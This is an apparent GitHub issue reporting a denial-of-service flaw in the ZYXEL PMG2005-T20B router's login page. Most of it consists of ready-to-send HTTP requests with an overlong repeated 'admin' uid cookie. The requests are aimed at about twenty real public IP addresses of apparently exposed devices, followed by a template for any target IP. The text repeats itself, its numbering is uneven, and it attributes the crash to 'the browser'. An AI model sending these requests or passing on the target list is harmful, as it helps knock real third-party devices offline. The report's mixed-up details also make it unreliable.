You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
ZYXEL-PMG2005-T20B has a denial of service vulnerability.Buffer Overflow vulnerability in ZYXEL ZYXEL v.PMG2005-T20B allows a remote attacker to cause a denial of service via a crafted script to the uid parameter in the cgi-bin/login.asp component.
Zyxel is a leading global provider of comprehensive communication and information solutions, providing innovative technology and product solutions for telecom operators, government and enterprise customers, and consumers worldwide. ZYXEL-PMG2005-T20B has a denial of service vulnerability. Attackers can exploit this vulnerability to cause the browser to crash.
Triggered process:Using a valid SESSIONID of the ZYXEL-PMG2005-T20B product, when the number of admin in the uid reaches 50, backend parsing can cause any web application of the product ZYXEL-PMG2005-T20B to crash.
The following are the details of the vulnerability:
1.Vulnerability Address:http://177.221.16.243/cgi-bin/login.asp
Request Package:
GET /cgi-bin/index.asp HTTP/1.1
Host: 177.221.16.243
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://177.221.16.243/cgi-bin/login.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234
Connection: close
Browser crashes after execution
2.Vulnerability Address:http://179.191.53.240/cgi-bin/login.asp
Request Package:
GET /cgi-bin/index.asp HTTP/1.1
Host: 179.191.53.240
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://179.191.53.240/cgi-bin/login.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234
Connection: close
Rumble
ZYXEL-PMG2005-T20B has a denial of service vulnerability.Buffer Overflow vulnerability in ZYXEL ZYXEL v.PMG2005-T20B allows a remote attacker to cause a denial of service via a crafted script to the uid parameter in the cgi-bin/login.asp component.
Zyxel is a leading global provider of comprehensive communication and information solutions, providing innovative technology and product solutions for telecom operators, government and enterprise customers, and consumers worldwide. ZYXEL-PMG2005-T20B has a denial of service vulnerability. Attackers can exploit this vulnerability to cause the browser to crash.
Triggered process:Using a valid SESSIONID of the ZYXEL-PMG2005-T20B product, when the number of admin in the uid reaches 50, backend parsing can cause any web application of the product ZYXEL-PMG2005-T20B to crash.
The following are the details of the vulnerability:
1.Vulnerability Address:http://177.221.16.243/cgi-bin/login.asp
Request Package:
GET /cgi-bin/index.asp HTTP/1.1
Host: 177.221.16.243
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://177.221.16.243/cgi-bin/login.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234
Connection: close
Browser crashes after execution
2.Vulnerability Address:http://179.191.53.240/cgi-bin/login.asp
Request Package:
GET /cgi-bin/index.asp HTTP/1.1
Host: 179.191.53.240
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://179.191.53.240/cgi-bin/login.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234
Connection: close
Browser crashes after execution
3.
Vulnerability Address:http://179.191.53.133/cgi-bin/login.asp
Request Package:
GET /cgi-bin/index.asp HTTP/1.1
Host: 179.191.53.133
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://179.191.53.133/cgi-bin/login.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234
Connection: close
Browser crashes after execution
Vulnerability Address:http://177.221.17.76/cgi-bin/login.asp
Request Package:
GET /cgi-bin/index.asp HTTP/1.1
Host: 177.221.17.76
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://177.221.17.76/cgi-bin/login.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234
Connection: close
Browser crashes after execution
5.Vulnerability Address:http://187.111.205.144/cgi-bin/login.asp
6.Vulnerability Address:http://179.191.53.138/cgi-bin/login.asp
7.Vulnerability Address:http://187.111.205.157/cgi-bin/login.asp
8.Vulnerability Address:http://189.36.156.42/cgi-bin/login.asp
9.Vulnerability Address:http://179.191.53.15/cgi-bin/login.asp
10.Vulnerability Address:http://45.182.161.27/cgi-bin/login.asp
11.Vulnerability Address:http://45.182.161.46/cgi-bin/login.asp
12.Vulnerability Address:http://45.182.161.42/cgi-bin/login.asp
13.Vulnerability Address:http://45.182.161.47/cgi-bin/login.asp
14.Vulnerability Address:http://45.182.161.43/cgi-bin/login.asp
15.Vulnerability Address:http://45.182.161.25/cgi-bin/login.asp
16.Vulnerability Address:http://179.191.53.89/cgi-bin/login.asp
17.Vulnerability Address:http://179.107.195.230/cgi-bin/login.asp
18.Vulnerability Address:http://45.182.161.41/cgi-bin/login.asp
19.Vulnerability Address:http://45.182.161.33/cgi-bin/login.asp
20.Vulnerability Address:http://45.182.161.45/cgi-bin/login.asp
Request package is:
GET /cgi-bin/index.asp HTTP/1.1
Host: IP
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://IP/cgi-bin/login.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234
Connection: close
Replacing the above two IPs with the target IP can cause the browser to crash
The following is a vulnerability replay video:
https://github.com/Rumble00/Rumble/assets/145107465/c1ad7082-513f-427f-9706-30c75097d586
The text was updated successfully, but these errors were encountered: